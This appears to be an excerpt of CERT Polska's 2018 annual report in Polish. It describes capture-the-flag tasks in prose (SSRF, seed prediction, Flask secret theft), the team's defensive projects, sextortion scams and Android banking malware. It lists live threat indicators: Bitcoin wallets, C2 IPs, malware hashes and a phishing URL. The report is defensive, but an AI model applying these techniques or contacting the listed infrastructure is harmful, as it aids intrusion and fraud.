Od 2012 r. w październiku obchodzony jest Eu-ropejski Miesiąc Cyberbezpieczeństwa. Jest to inicjatywa Komisji Europejskiej oraz Agencji Unii Europejskiej ds. Bezpieczeństwa Sieci i Informa-cji (ENISA). W ramach akcji “European Cyber-security Month (ECSM)” każdy z krajów człon-kowskich co roku organizuje wydarzenia mające poprawić świadomość o zagrożeniach występu-jących w internecie.

Zespół CERT Polska podejmuje inicjatywy mają-ce na celu zwiększenie świadomości użytkowni-ków oraz specjalistów bezpieczeństwa teleinfor-matycznego. Jedną z takich inicjatyw, wpisanych w akcję ECSM, jest dwudniowa konferencja SE-CURE (patrz str. 24).

Podczas ECSM 2018 nie zabrakło również kon-kursu Capture The Flag, który składał się łącznie z sześciu zadań z kategorii: atakowanie aplikacji webowych, forensics, inżynieria wsteczna oraz kryptografia. Zwycięzcami zostały trzy pierwsze osoby, którym udało się rozwiązać komplet za-dań. Poniżej prezentujemy ogólny opis każdego z wyzwań, jednocześnie przypominając, że wy-brane konkursy archiwalne wciąż są dostępne na stronie hack.cert.pl/challenges.

Zadanie “crackme” składało się z programu wy-konywalnego, który prosił o wpisanie flagi, a na-stępnie informował, czy jest ona poprawna czy też nie. Po deasemblacji programu nietrudno było zauważyć, że fragmenty kodu odpowiedzialne za weryfikację flagi zostały zaszyfrowane. Sama flaga sprawdzana była w trzybajtowych blokach, więc zadanie można było rozwiązać za pomo-cą techniki “reverse debugging”, poprzez odpo-wiednią modyfikację kodu aplikacji albo ręczne zdjęcie każdej warstwy szyfrowania kodu.

Zadanie “notes” to prosta aplikacja webowa ofe-rująca notatnik on-line i podstawowy widok profi-lu użytkownika. Oczekiwanym rozwiązaniem za-dania było przeprowadzenie ataku SSRF (ang. Server Side Request Forgery) poprzez formularz dodawania awatara. Podczas takiej operacji,


serwer każdorazowo ściągał obrazek z podane-go linku. Programista aplikacji sprawił, że “dla wygody” każda sesja z adresu localhost otrzy-mywała prawa administratora, możliwe więc było nadużycie formularza dodawania awatara i w ten sposób wykonanie operacji z konta o podwyż-szonych uprawnieniach.

W zadaniu “kpn” otrzymujemy 32-bitowy plik wy-konywalny ELF. Po jego uruchomieniu widzimy wiadomość zachęcającą do gry w “kamień, pa-pier, nożyce” oraz informację, że - aby otrzymać flagę - potrzebne jest 100 wygranych z rzędu. Program posiada kilka błędów implementacyj-nych, które pozwalają z dużym prawdopodobień-stwem przewidzieć wartość ziarna losowości używanego w funkcji rand(), a następnie odnieść pasmo sukcesów w związku z pełną znajomo-ścią przyszłych ruchów komputera-przeciwnika.

“Zipowa forteca”, jak sama nazwa wskazuje, składała się z pojedynczego pliku archiwum w formacie ZIP, który należało wypakować. Nie-stety, próba wykonania tej czynności kończyła się, w zależności od użytego narzędzia, komuni-katem o uszkodzonym pliku lub prośbą o podanie hasła. Konieczne było więc przyjrzenie się pliko-wi z bliska - najlepiej hexedytorem oraz skon-sultowanie swoich obserwacji ze specyfikacją formatu ZIP. Prawidłowe podzielenie pliku na mniejsze części umożliwiało odpakowanie naj-pierw hasła do właściwego archiwum z flagą, a później samej flagi.

Zadanie “Przeszukanie” zawierało aplikację we-bową z zaawansowaną wyszukiwarką opartą o składnię Apache Lucene. W celu rozwiązania zadania należało wykraść zawartość zmien-nej konfiguracyjnej SECRET_KEY w aplikacji napisanej z użyciem frameworka Flask. Błąd w implementacji umożliwiał na niemal nieograni-czone użycie refleksji na wyszukiwanych obiek-tach, co po znalezieniu odpowiednich referen-cji umożliwiało odwołanie się bezpośrednio do app.__dict__. Pozyskanie treści flagi było wtedy możliwe za pomocą techniki zbliżonej do “blind SQL injection”, zaadaptowanej do tej konkretnej sytuacji.

W zadaniu “outsourz3d” należało w krótkim cza-sie przeprowadzić inżynierię wsteczną wielu podobnych do siebie aplikacji wykonywalnych, a konkretnie - dla każdej z nich znaleźć prawi-dłowe hasło. Kod w aplikacjach wykorzysty-wał relatywnie proste operacje, tzn. każdy test sprawdzał dokładnie jeden znak i opierał się na prostych operacjach (alternatywa wykluczająca, dodawanie, odejmowanie, rotacja bitowa itp.). W związku z tym, bardzo dobrym narzędziem do rozwiązania tego problemu był framework do analizy symbolicznej angr13.

Pełne opisy zadań znajdują się na naszym blo-gu14.

Biuletyn Ouch!

Od 2011 roku CERT Polska przygotowuje polską wersję biuletynu edukacyjnego “Ouch!”. Jest to publikacja Instytutu SANS, w formie dwustroni-cowego miesięcznika, poruszającego aspekty cyberbezpieczeństwa w codziennym styku z technologią językiem zrozumiałym dla wszyst-kich.

W 2018 roku z “Ouch!” można było dowiedzieć się m.in. o tym, czym jest cyberbezpieczny dom,

jak bezpiecznie korzystać z poczty elektronicz-nej, o socjotechnice czy konsekwencjach GDPR.

“OUCH!” jest udostępniony na licencji Creative Commons BY-NC-ND 3.0, co oznacza, że biu-letyn może być dowolnie rozpowszechniany w każdej organizacji, pod warunkiem, że nie jest wykorzystywany w celach komercyjnych. Wszystkie polskie wydania można znaleźć pod adresem: http://www.cert.pl/ouch.

13 https://angr.io/14 https://www.cert.pl/news/single/ecsm-2018-rozwiazania-zadan/


Projekty

SOASP

W 2018 kontynuowaliśmy projekt Strengthening operational aspects of cyber-security capacities in Poland (SOASP). Jego celem jest zwiększenie możliwości operacyjnych i analitycznych zespo-łu, ze szczególnym uwzględnieniem obowiąz-ków wynikających z ustawy o krajowym systemie cyberbezpieczeństwa (więcej szczegółów na temat ustawy: znajduje się w rozdziale „Zmiany w sposobie zgłaszania incydentów związanych z wejściem w życie ustawy o krajowym syste-mie cyberbezpieczeństwa” na str. 14). Wszyst-kie prace opisane poniżej są współfinansowane przez program CEF (Connecting Europe Facili-ty), numer akcji 2016-PL-IA-0127.

Rozwój systemu Cuckoo

Cuckoo Sandbox15 to popularny system do au-tomatycznej analizy szkodliwego oprogramo-wania, tzw. sandbox. Narzędzie jest darmowe i dostępne na otwartej licencji. We współpracy z autorami Cuckoo (Hatching.io) zostały rozwi-nięte możliwości analizy statycznej, która umoż-liwia wydobywanie kluczowych informacji o ba-danych próbkach, w szczególności szczegóły związane z komunikacją z serwerami Command and Control (adresy IP, klucze szyfrujące, ziarna DGA). Dodatkowo wzmocniono zabezpieczenia sandboxa przed niektórymi technikami, które szkodliwe oprogramowanie stosuje w celu utrud-nienia jego analizy. Podsumowanie prac zostało opublikowane na oficjalnym blogu: https://hatching.io/blog/onemon-cuckoo-release.

Udostępnienie serwisu MWDB

W ramach prac w projekcie SOASP udostępnili-śmy możliwość korzystania z naszego repozyto-rium złośliwego oprogramowania, a także do au-tomatycznych analiz statycznych i dynamicznych. Więcej informacji znajduje się na stronie str. 32.

Wydanie n6 na otwartej licencji

n6 (Network Security Incident eXchange) to nasz autorski system do automatycznego zbierania, przetwarzania i dystrybucji informacji na temat zagrożeń sieciowych. Pozwala on naszemu ze-społowi na przekazywanie danych do właścicieli sieci, administratorów i operatorów. Informacje o zagrożeniach, które udostępniamy to m.in.:- zainfekowane komputery (boty),- strony wyłudzające dane dostępowe (phishing),- infrastruktura sterująca botnetami,- strony rozpowszechniające szkodliwe oprogramowanie,- źródła ataków na usługi sieciowe,- i wiele innych.

System obsługuje wiele rodzajów źródeł informa-cji, w tym pochodzące od innych CSIRT-ów, firm komercyjnych, organizacji non-profit i niezależ-nych badaczy. Wykorzystujemy go do przetwa-rzania i dostarczania do odpowiednich odbior-ców milionów zdarzeń bezpieczeństwa dziennie. W 2018 roku przy pomocy n6 przetworzyliśmy ponad 350 mln zdarzeń bezpieczeństwa. Szcze-gółowe statystyki znajdują się w ostatnim roz-dziale niniejszego raportu.

Po kilku latach rozwoju zdecydowaliśmy się na udostępnienie oprogramowania całej społecz-ności zespołów reagowania na incydenty bez-pieczeństwa oraz wszystkim, którzy potrzebują przetworzyć znaczne ilości informacji o zagroże-niach (Indicators of Compromise). Kod źródło-wy jest dostępny na naszym profilu w serwisie GitHub16.

Każda organizacja w Polsce może bezpłat-nie uzyskać dostęp do danych znajdujących się w naszej instancji n6, które dotyczą jej sie-ci. Szczegóły znajdują się na stronie projektu: https://n6.cert.pl/.

15 http://www.cuckoosandbox.org/16 https://github.com/CERT-Polska/n6


SISSDEN

Kontynuujemy prace nad globalnym systemem monitorowania ataków na publicznie dostępne usługi sieciowe. W ramach projektu SISSDEN utrzymywana jest sieć sensorów opartych na nisko-interaktywnych honeypotach, czyli pułap-kach emulujących rzeczywiste usługi, które reje-strują wszystkie próby ataków.

Na koniec 2018 r. możemy pochwalić się wdro-żeniem 9 różnych honeypotów monitorujących

szereg usług, w tym SSH, Telnet, WWW, RDP, VNC, SMTP, interfejsy systemów przemysło-wych, czy usługi, które mogą zostać nadużyte do przeprowadzenia ataków DDoS (dokładniej Distributed Reflected Denial of Service), np. otwarte serwery DNS. Udało nam się również przekroczyć poziom 200 aktywnych sond sys-temu, pokrywając 6 kontynentów oraz prawie wszystkie kraje w Europie. Poniżej zamieszcza-my mapy, które obrazują liczbę monitorowanych publicznych adresów IP na przełomie roku 2018 i 2019 (jedna sonda najczęściej posiada kilka publicznych adresów).

Rysunek 8. Mapy obrazujące liczbę monitorowanych publicznych adresów IP na przełomie roku 2018 i 2019.


Z naszych obserwacji wynika, że obecnie naj-częściej atakowaną usługą jest Telnet, czyli pro-tokół wykorzystywany do zdalnego zarządzania urządzeniami (np. routery, kamery). Logowania na domyślne konta poprzez Telnet jest wyko-rzystywane przez wiele botnetów, m.in. przez opisywany przez nas w zeszłych latach Mirai17. Wykres poniżej przedstawia liczbę ataków na usługi Telnet i SSH rejestrowane przez nasze

honeypoty w ujęciu tygodniowym. Pod koniec roku obserwowaliśmy niecałe 2 miliony ataków dziennie, czyli ponad 12 milionów tygodnio-wo. Stały wzrost liczby rejestrowanych zdarzeń w ciągu roku częściowo wynika z powiększania sieci sensorów, jednak od sierpnia można za-uważyć istotne zwiększenie intensywności ata-ków na protokół Telnet, który dominuje w naszym zestawieniu.

Zagrożenia zidentyfikowane dzięki sieci ho-neypotów są przekazywane operatorom sieci i zespołom reagowania na zagrożenia w po-staci darmowych raportów wysyłanych przez Shadowserver (https://www.shadowserver.org/). Shadowserver jest organizacją non-profit wspie-rająca organy porządku publicznego, CSIRT-y oraz inne podmioty na całym świecie w celu zwalczania botnetów i innych zagrożeń. Aby otrzymywać raporty dotyczące swojej sieci wy-starczy zapisać się poprzez portal użytkownika SISSDEN: https://portal.sissden.eu/. Funkcjo-nalność portalu będzie sukcesywnie rozbudowy-wana w kolejnym roku.

Drugie istotne narzędzie stworzone w ramach projektu to system monitorujący darknet (tzw. teleskop sieciowy). System był używany przez cały rok do analizy istotnych zdarzeń, takich jak rekordowe ataki DDoS w lutym18 19. Do przepro-wadzenia wspomnianych ataków wykorzystano wzmocnienie (tzw. Distributed Reflected Denial of Service) posługując się niezabezpieczonymi serwerami z uruchomioną usługą Memcache. Analiza danych z darknetu pozwoliła ustalić, że port UDP używany przez Memcache był celem dużych skanowań w dniach poprzedzających pierwsze ataki. Ilustruje to wykres poniżej, który przedstawia liczbę pakietów na port wykorzysty-wany przez Memcache.

17 Krajobraz bezpieczeństwa polskiego internetu 2016. https://www.cert.pl/PDF/Raport_CP_2016.pdf18 https://githubengineering.com/ddos-incident-report/ 19 https://www.netscout.com/blog/asert/netscout-arbor-confirms-17-tbps-ddos-attack-terabit-attack-era

telnetSSH

2018-02-01 2018-03-01 2018-04-01 2018-05-01 2018-06-01 2018-07-01

2,000,000

4,000,000

6,000,000

8,000,000

10,000,000

2018-08-01 2018-09-01 2018-10-01 2018-11-01 2018-12-01

Cou

nt

Wykres 1. Liczba ataków na usługi Telnet i SSH rejestrowane przez honeypoty projektu SISSDEN w ujęciu tygodniowym.


Skala monitorowanej przestrzeni adresowej po-zwala na dokładną obserwację rozproszonych skanowań portów oraz efektów ataków DoS wykorzystujących pakiety ze sfałszowanymi ad-resami źródłowymi (zazwyczaj tzw. SYN flood). Średnio rejestrujemy aż pół miliona pakietów na minutę, czyli ok. 25 miliardów miesięcznie, z czego 80% to pakiety TCP. Cały ruch jest na bie-żąco analizowany, a informacje o wykrytych ata-kach dystrybuujemy wykorzystując platformę n6 (patrz str. 27). W 2019 planujemy dalszy rozwój systemu, m.in. poprzez implementację algoryt-mów automatycznie wykrywających anomalie, co pozwoli nam z wyprzedzeniem identyfikować podejrzaną aktywność sieciową. Duża część naszych prac w projekcie dotyczy analizy szkodliwego oprogramowania. W ra-mach projektu stworzyliśmy i utrzymujemy sys-tem do śledzenia aktywności botnetów: mtrac-ker. Szczegóły techniczne dotyczące narzędzia można znaleźć na naszej stronie20. W roku 2018 mtracker był używany do monitorowania dzia-łań 16 rodzin malware, m.in. Emotet21, Tofsee22 i Ramnit23.

Projekt realizowany jest w europejskim konsor-cjum, w którym NASK pełni rolę koordynatora oraz jednego z głównych wykonawców. Szcze-

gółowe informacje oraz wybrane analizy znaj-dują się na oficjalnej stronie: https://sissden.eu/. Bieżące informacje publikujemy na Twitterze (@sissden). Projekt SISSDEN otrzymał finanso-wanie z Programu Ramowego Unii Europejskiej Horyzont 2020 (H2020-DS-2015-1) w ramach grantu nr 700176.

RegSOC

W połowie 2018 r., wspólnie z Politechniką Wrocławską (lider konsorcjum) oraz Instytutem Technik Innowacyjnych EMAG, rozpoczęliśmy prace nad projektem RegSOC (Regionalne Cen-trum Bezpieczeństwa Cybernetycznego). Celem projektu jest przygotowanie i uruchomienie pro-totypu modelowego rozwiązania regionalnego centrum cyberbezpieczeństwa ze szczególnym uwzględnieniem specyfiki podmiotów publicz-nych, w tym jednostek administracji rządowej oraz samorządowej.

W ramach projektu NASK zajmuje się tematyką śledzenia kampanii spamowych. W obszarze zainteresowań są e-maile zawierające szko-dliwe oprogramowanie lub odnośniki do stron phishingowych, będące najczęściej wykorzysty-waną metodą ataku, skierowaną zarówno na

Github DoS1.3 Tbps

Reported DoS1.7 Tbps

Mar 05Feb 26Feb 19

0

2

4

6

date

M p

acke

ts p

er d

ay

Wykres 2. Liczba pakietów na port wykorzysty wany przez Memcache.

20 https://www.cert.pl/news/single/mtracker-sposob-sledzenie-zlosliwego-oprogramowania/ 21 https://www.cert.pl/news/single/analiza-zlosliwego-oprogramowania-emotet-v4/ 22 https://www.cert.pl/news/single/glebsze-spojrzenie-moduly-tofsee/ 23 https://www.cert.pl/news/single/ramnit-doglebna-analiza/


użytkowników indywidualnych, jak również firmy oraz instytucje. Szybka identyfikacja oraz ana-liza kampanii jest kluczowa z punktu widzenia działalności CERT Polska, szczególnie w celu ostrzegania użytkowników oraz neutralizowania zagrożeń.

W ramach projektu opracowaliśmy prototypowe narzędzie do zbierania i wstępnej analizy spa-mu. Potrafi ono działać jako tzw. „spamtrap”, czyli system, który zbiera wiadomości wysyłane na nieistniejące skrzynki pocztowe, utworzone specjalnie na potrzeby monitorowania zagro-żeń. Nasze narzędzie można również uruchomić w trybie honeypota (pułapki) udającego otwarty serwer pocztowy, czyli tzw. serwer open-relay. Jest to niepoprawnie skonfigurowana usługa pocztowa, która może zostać wykorzystana do rozsyłania spamu. W obu przypadkach zbieramy e-maile, które z założenia można traktować jako niepożądane.

Obecnie prowadzimy prace nad algorytmami służącymi do grupowania spamu w zbiory powią-zanych wiadomości, co pozwoli wykrywać nowe kampanie niemal w czasie rzeczywistym. W ko-lejnych krokach zostaną stworzone systemy do automatycznej analizy treści i załączników, co ułatwi określenie celów ataków.

Ponadto istotnym zadaniem NASK w projekcie jest określenie modelu współpracy pomiędzy centrum regionalnym a zespołami CSIRT pozio-mu krajowego, w szczególności CSIRT NASK. Model współpracy powinien określać m.in. spo-sób i zakres wymiany informacji oraz zgłaszania incydentów.

Projekt jest współfinansowany przez Narodowe Centrum Badań i Rozwoju w ramach programu CyberSecIdent - „Cyberbezpieczeństwo i eToż-samość” i zakończy się w roku 2021.

Cyber Exchange

W listopadzie oficjalnie rozpoczęliśmy program wymiany ekspertów pomiędzy 11 europejski-mi zespołami typu CERT. Staże zagraniczne

pozwolą specjalistom z krajowych, rządowych i akademickich zespołów reagowania na po-znanie specyfiki pracy analogicznych instytucji w innych krajach, wymianę wiedzy i doświad-czeń oraz nawiązanie bezpośrednich kontaktów, które są kluczowym elementem sprawnej współ-pracy międzynarodowej.

Oprócz CERT Polska, w wymianie biorą udział pracownicy podobnych zespołów z Austrii, Chor-wacji, Czech, Grecji, Łotwy, Luksemburga, Mal-ty, Rumunii i Słowacji. Liderem konsorcjum jest czeskie stowarzyszenie CZ.NIC, w ramach któ-rego funkcjonuje CSIRT.CZ.

Większość staży odbędzie się w roku 2019. Projekt zakłada również współpracę w warstwie technicznej, polegającą na wymianie narzędzi informatycznych do analizy zagrożeń w sieci i wspierających obsługę incydentów.

Projekt jest finansowany z funduszy Unii Euro-pejskiej w ramach programu Komisji Europej-skiej Connecting Europe Facility24. Jego realiza-cja zakończy się pod koniec 2020 r.

Forensics

Kolejnym projektem Zespołu CERT Polska roz-poczętym już w 2017 r. jest Zaawansowane Laboratorium Kryminalistyki Śledczej, współ-tworzone z Zakładem Cyberbezpieczeństwa Politechniki Warszawskiej w ramach programu CyberSecIdent Narodowego Centrum Badań i Rozwoju. CyberSecIdent to program badaw-czo-rozwojowy mający podnieść poziom bezpie-czeństwa cyberprzestrzeni RP poprzez zwięk-szenie dostępności rozwiązań sprzętowych i programistycznych.

W ramach projektu eksperci zespołu CERT Polska, wspólnie z zespołem z Politechniki Warszawskiej, opracowują zestaw specjalistycznych narzędzi oraz rozwiązań. Celem jest wsparcie organów ści-gania w walce z przestępczością, która coraz czę-ściej korzysta z nowoczesnych metod komunikacji oraz archiwizacji danych.

Powołany przez CERT Polska w 2018 r. zespół analiz informatyki śledczej zajmuje się testowa-niem opracowanych rozwiązań w realnych wa-runkach. Wspiera organy ścigania w zakresie

24 nr grantu 2017-EU-IA-0118


działań terenowych i analizy zgromadzonego materiału dowodowego.

W ramach projektu prowadzone są prace nad rozbudową kompetencji z zakresu rozpoznania radiowego, wchodzącego w skład mobilnego labo-ratorium, które pozwala na wykrywanie nieupraw-

nionych transmisji oraz źródeł sygnałów. Mobil-ne laboratorium zostało dodatkowo wyposażone w nawigację inercyjną umożliwiającą wykonanie dokładnych pomiarów źródeł sygnału, zarówno w podziemnych garażach jak i obszarach, w któ-rych występują zakłócenia sygnału GPS - tere-nowe bądź umyślne.

System MWDB

Analiza złośliwego oprogramowania to jedno z wyzwań, przed którymi stoi niemal każdy ze-spół odpowiedzialny za cyberbezpieczeństwo. Wirusy często dystrybuowane są na szeroką skalę, zatem skoordynowana wymiana infor-macji na ich temat pomiędzy organizacjami może przynieść obopólne korzyści. W związku z tym, na początku roku 2019 zespół CERT Pol-ska udostępnił na specjalnych zasadach swoje wewnętrzne repozytorium malware dla ze-wnętrznych analityków.

Każdy użytkownik posiadający konto w MWDB może zobaczyć dodane przez siebie próbki zło-śliwego oprogramowania w odwróconym po-rządku chronologicznym. Każda próbka dodana do repozytorium automatycznie trafia do sys-temów analitycznych CERT Polska, a niektóre z nich zostają wytypowane do ręcznej analizy.

Rysunek 9. Strona główna systemu MWDB prezentująca ostatnio dodane próbki (dane archiwalne).


Z próbkami znajdującymi się w MWDB powiązane są podstawowe dane, takie jak poszczególne skróty kryptograficzne (hashe), rodzaj pliku, jego rozmiar itp.

Repozytorium śledzi również relacje pomiędzy powiązanymi próbkami w postaci drzewiastej. Przy-kładowo, jeżeli próbka złośliwego oprogramowania próbuje zainstalować na komputerze ofiary do-datkowe moduły, to zostaną one dowiązane w MWDB jako próbki potomne (“child”).

W zamian za dodanie próbki do systemu, można zobaczyć informacje pozyskane w toku analizy, np. przypisanie do konkretnej rodziny złośliwe-go oprogramowania oraz konfigurację statyczną (jeżeli uda się ją pozyskać). Poprzez “konfigu-rację” należy rozumieć wszystkie szczegółowe informacje, które uda się wydobyć bezpośrednio z danej próbki, np. adresy serwerów C&C czy wykorzystywane klucze szyfrujące.

Przyznawanie dostępu podmiotom zewnętrznym odbywa się w oparciu o następujące zasady:• użytkownik posiada dostęp do próbek, które

sam dodał do MWDB;• w zamian za dodanie próbki, użytkowniko-

wi udostępniane są informacje na jej temat pozyskane w toku automatycznych i manu-alnych analiz (z zastrzeżeniem, że analizie manualnej poddawane są tylko wybrane próbki);

• próbki znajdujące się w MWDB mogą być przez nas udostępniane podmiotom ze-wnętrznym.

System jest przeznaczony dla analityków zaj-mujących się złośliwym oprogramowaniem. O utworzenie konta mogą wnioskować osoby, które wskażą swoją afiliację, np. jako pracownika CERT-u, firmowego zespołu odpowiedzialnego za cyberbezpieczeństwo, albo uczelni zajmują-cej się badaniami w zakresie złośliwego opro-gramowania. Zainteresowanych zapraszamy do kontaktu pod adresem [email protected], jednocze-śnie zastrzegając sobie prawo do odpowiedzi wyłącznie na zatwierdzone zgłoszenia.

Rysunek 10. Szczegółowy widok próbki w MWDB. Widoczne są odwołania do droppera oraz próbki plików wykonywalnych z następnych etapów infekcji.


Rośnie liczba złośliwych aplikacji dla urządzeń mobilnych, przede wszystkim z systemem Android. Wiele z nich, między innymi podszywających się pod legalne aplikacje finansowe, dostępnych było do pobrania w oficjalnym sklepie.

Przemysław Jaroszewski,Kierownik CERT Polska

Zdj.

unsp

lash

.com

, Zac

hary

Xu


W tej części raportu opisujemy wybrane - nowe bądź zyskujące na znaczeniu - zagrożenia, które w szczególny sposób dotyczyły polskich użytkowników internetu.

Sextortionscams-“ZnamTwojehasło”

Pierwsza zaobserwowana przez CERT Polska w 2018 roku kampania określona mianem „sextorion scams”, której celem było wyłudzenie pieniędzy od użytkowników, miała miejsce w kwietniu.

Wiadomości rozsyłane były w wielu różnych wariantach, ale wszystkie opierały się na takim samym schemacie. Atakujący sugerowali, że posiadają kompromitujące ofiarę nagranie zdobyte poprzez złośliwą reklamę umieszczoną w serwisie z filmami dla dorosłych lub zainstalowane na komputerze złośliwe oprogramowanie. Przelanie okupu w wysokości około 300 USD miało ustrzec ofiarę przed publikacją wideo.

Zagrożenia i incydenty krajowe

Rysunek 11. Przykład wiadomości typu „sextortion scam”.

Podobna kampania została zaobserwowana w połowie lipca. Wydawać by się mogło, że schemat ataku nie różnił się od poprzedniego: “zapłać bitcoiny na wskazane konto, bo mamy nagrania”, ale była w nim znacząca zmiana. W pierwszym zdaniu otrzymanego maila ofiara mogła przeczytać swoje prawdziwe hasło (bez wyjaśnienia, z jakiego serwisu pochodzi, zapewne w nadziei, że to samo hasło używane jest w wielu miejscach). Różniła się też kwota okupu, która wzrosła z około 300 USD do około 3000 USD. Większość danych ofiar pochodziła z wycieków LinkedIn i Dropbox. Zamieszczenie w treści maila hasła użytkownika prawdopodobnie miało na celu wywarcie silnej psychologicznej presji. Przestępca zapewniał, że w momencie wejścia na stronę z treściami por-nograficznymi, uzyskał dostęp do komputera przez protokół RDP. Deklarował, że jest w posiadaniu kontaktów z portali społecznościowych oraz skrzynki pocztowej. Połowa wideo zawierała nagrany ekran, a druga połowa - widok z wbudowanej kamery.

Przykładowe zarejestrowane przez CERT Polska adresy portfeli Bitcoin rozsyłane w tej kampanii:1Je5CbHkcdjnMfbna78y4FfomRHQX2xawU1AoQB1GHm41XrrbZ6orcH4eKA5nummvGgr14nBqkd48qJ8WLni8KSgwEx3AiZWz53SAd18gyZFAVhZ7pVBaFaTP5LDsoyGbuwFCSQa1PhAzthZMqAaFHBAEDLinbNk6yZBVVfyrr1PjUiw2oesScKsba9uwVanMPzpzr3Fn1DX

Zdj.

unsp

lash

.com

, Zac

hary

Xu



Oprócz wiadomości podobnych do tych z lipca, pojawił się też nowy schemat działania. Tym razem przestępca informował, że kilka miesięcy wcześniej włamał się na pocztę elektroniczną użytkownika za pomocą hasła podanego na jakiejś stronie internetowej. Ostrzegał ofiarę, że zmiana hasła nie po-może, ponieważ zainstalowane na komputerze złośliwe oprogramowanie zgłosi ten fakt atakujące-mu. Tak jak poprzednio, odbiorca wiadomości był informowany o rzekomym zdjęciu zrobionym przy użyciu kamery oraz zrzucie ekranu. Dodatkowo, rzekomo zainstalowane złośliwe oprogramowanie miało przekazać sprawcy, że wiadomość została odczytana i od tego momentu ofiara miała dokład-nie 48 godzin na zapłacenie okupu. Ciekawym i nowym zabiegiem było zastosowanie spoofingu adresu e-mail, przez co wiadomość wyglądała, jakby została wysłana z konta ofiary do samej siebie.

Od tego czasu CERT Polska notował pojedyncze zgłoszenia związane z opisywaną próbą wyłudze-nia. W październiku 2018 r. liczba zgłoszeń (zapewne także liczba rozsyłanych wiadomości) wyraź-nie się zwiększyła. Zmieniła się również kwota do zapłaty, która zmalała do 800 USD.


Kolejna interesująca modyfikacja tej popularnej w 2018 r. formy ataku została zaobserwowana w listopadzie. Treść wiadomości była prawie taka sama jak poprzednio, ale została przetłumaczona na język polski. Pod koniec maila dodano informację, że dane zostały już przesłane na serwer ze-wnętrzny. Pokazuje to, że kampania - w przeciwieństwie do poprzednich - została skierowana tylko do polskojęzycznych użytkowników.


Rysunek 14. Przykład wiadomości typu „sextortion scam” skierowanej do polskich użytkowników.


Ostatnia tego typu kampania w 2018 r. została zaobserwowana przez analityków firmy Proofpoint. Wiadomości były w języku angielskim. Sama treść była bardzo podobna do wiadomości z paździer-nika z tą zmianą, że przestępca nie podawał swojego portfela Bitcoin tylko link do chmury, gdzie miał znajdować się opisywany przez niego materiał kompromitujący ofiarę. Po kliknięciu w link ofiara pobierała stealer AZORult, a ostatecznie dane były szyfrowane przez ransomware Gandcrab.

Androidowekampaniezłośliwegooprogramowania

W 2018 r. obserwowaliśmy szereg kampanii złośliwego oprogramowania, wymierzonych w polskich i zagranicznych użytkowników systemu Android. Celem każdej kampanii było nakłonienie użytkow-nika do instalacji szkodliwej aplikacji. Na skutek przydzielonych uprawnień umożliwiała ona atakują-cemu przejęcie kontroli nad urządzeniem ofiary. Do głównych zadań malware’u należało wykradanie danych logowania do aplikacji bankowych oraz przechwytywanie komunikacji SMS i powiadomień z kodami autoryzującymi transakcje. Wybrane rodziny złośliwego oprogramowania, w zależności od dystrybuowanego wariantu, oferowały dodatkowe funkcje. Najpopularniejsze z nich to: dostęp do mi-krofonu i kamery, pobieranie informacji o lokalizacji ofiary, wykonywanie zrzutów ekranu i dostęp do plików zapisanych na urządzeniu. Poniżej przedstawiamy krótką charakterystykę wybranych próbek, wraz ze sposobami ich dystrybucji.

Flaga Polski

Fałszywa aplikacja była dostępna do pobrania ze sklepu Google Play. Malware oferował rzeczywistą funkcjonalność, polegającą na możliwości zmiany tła na urządzeniu. Złośliwy kod w niewidoczny dla użytkownika sposób łączył się z ustalonym przez przestępcę serwerem, z którego pobierał jeden z wariantów popularnego w ostatnim czasie bankbota Anubis (patrz str. 55). Na chwilę obecną szko-dliwa aplikacja nie jest już dostępna w sklepie Google. Bazując na danych z nieoficjalnych serwisów lustrzanych możemy wnioskować, że była ona dystrybuowana w dwóch odsłonach. Pierwsza wersja aplikacji (Flaga Polski - com.kaishapp.flag.app)25 dostępna była do pobrania na początku marca, druga wersja pod nieco zmienioną nazwą (Flaga Polski - com.flag.pl.android.noad)26, widoczna była w markecie pod koniec kwietnia27.

26 https://apkgk.com/com.kaishapp.flag.app27 https://apkpure.co/flaga-polski-com-flag-pl-android-noad/28 https://twitter.com/pr3wtd/status/994581442222022657

Rysunek 15. Pobieranie aplikacji z Google Play.(źródło: Twitter: @pr3wtd)

Rysunek 16. Flaga Polski - widok po uruchomieniu.


Wskaźniki infekcjiAdresy IP28: - 194.165.16.28:81- 31.184.234.30Złośliwy payload:- SHA256: 7f6799d4fc35759485ee5346ae767e4f9ed6432f053071a760810486f1e73a80- SHA256: 63f716bb51055fc26ea40826d775be3373b0215b9694c278251c7f981b79fe2c

Instalatory aplikacji:- Flaga Polski (com.kaishapp.flag.app) SHA256: c408ea8a2fad9665e2422bc8ce7143e97fef7613071c19d64483a3e3c9cbbf18- Flaga Polski (com.flag.pl.android.noad) SHA256: fc359b0539bc4752fde699b7915fe379bad5e7c3436ca8ec22efe1f9bc95262e

BankowośćuniwersalnaPolska

O pojawieniu się w serwisie Google Play fałszywej aplikacji, wymierzonej w użytkowników polskiej bankowości mobilnej, poinformował 20 marca na swoim Twitterze użytkownik m0br3v. Złośliwy kod wykradał dane dostępowe i dane kart płatniczych z 21 popularnych aplikacji bankowych. Niemal w tym samym czasie, podobna aplikacja atakowała klientów korzystających z aplikacji mobilnych 6 banków rosyjskich29.

Rysunek 17. Widok aplikacji w sklepie Google Play / okno wyboru banku po uruchomieniu (źródło: Twitter: @m0br3v).

Wskaźniki infekcji30

Instalatory aplikacji:- Universal online banking Poland (tpr.gdsss.kkil) - wersja polskojęzyczna SHA256: 1da19ee46a6ba488715dd44bd165785498f001846f2f7e8d4d6c47c1d0b8e20e- Универсальный мобильный банкинг (xpm.nbnvc.huoijoi) - wersja rosyjskojęzycznaSHA256: 026046f0f6fcd9031be70d5095d28dfa2f599b5e31eb5f0286e2484754548adbPowiązane domeny:- wecomeeu.com - wersja polskojęzyczna- wecomeru.com - wersja rosyjskojęzyczna

28 https://twitter.com/pr3wtd/status/99458144222202265729 https://twitter.com/m0br3v/status/97606473562289356830 https://twitter.com/m0br3v/status/976064735622893568


CertyfikatLTE5+

W kampanii użyto zabiegi socjotechniczne, wykorzystujące okoliczności wejścia w życie Rozpo-rządzenia o Ochronie Danych Osobowych (RODO). Użytkownik utrzymywał SMS z numeru Info, który informował go o konieczności instalacji certyfikatu LTE 5+, aby zapobiec utracie możliwości dalszego wykonywania/odbierania połączeń i transmisji danych. Nadawca wiadomości podpisywał się jako Operator, sugerując otwarcie linku prowadzącego do strony http://vrte462.com/nieblokuj/, gdzie miała znajdować się instrukcja instalacji31.

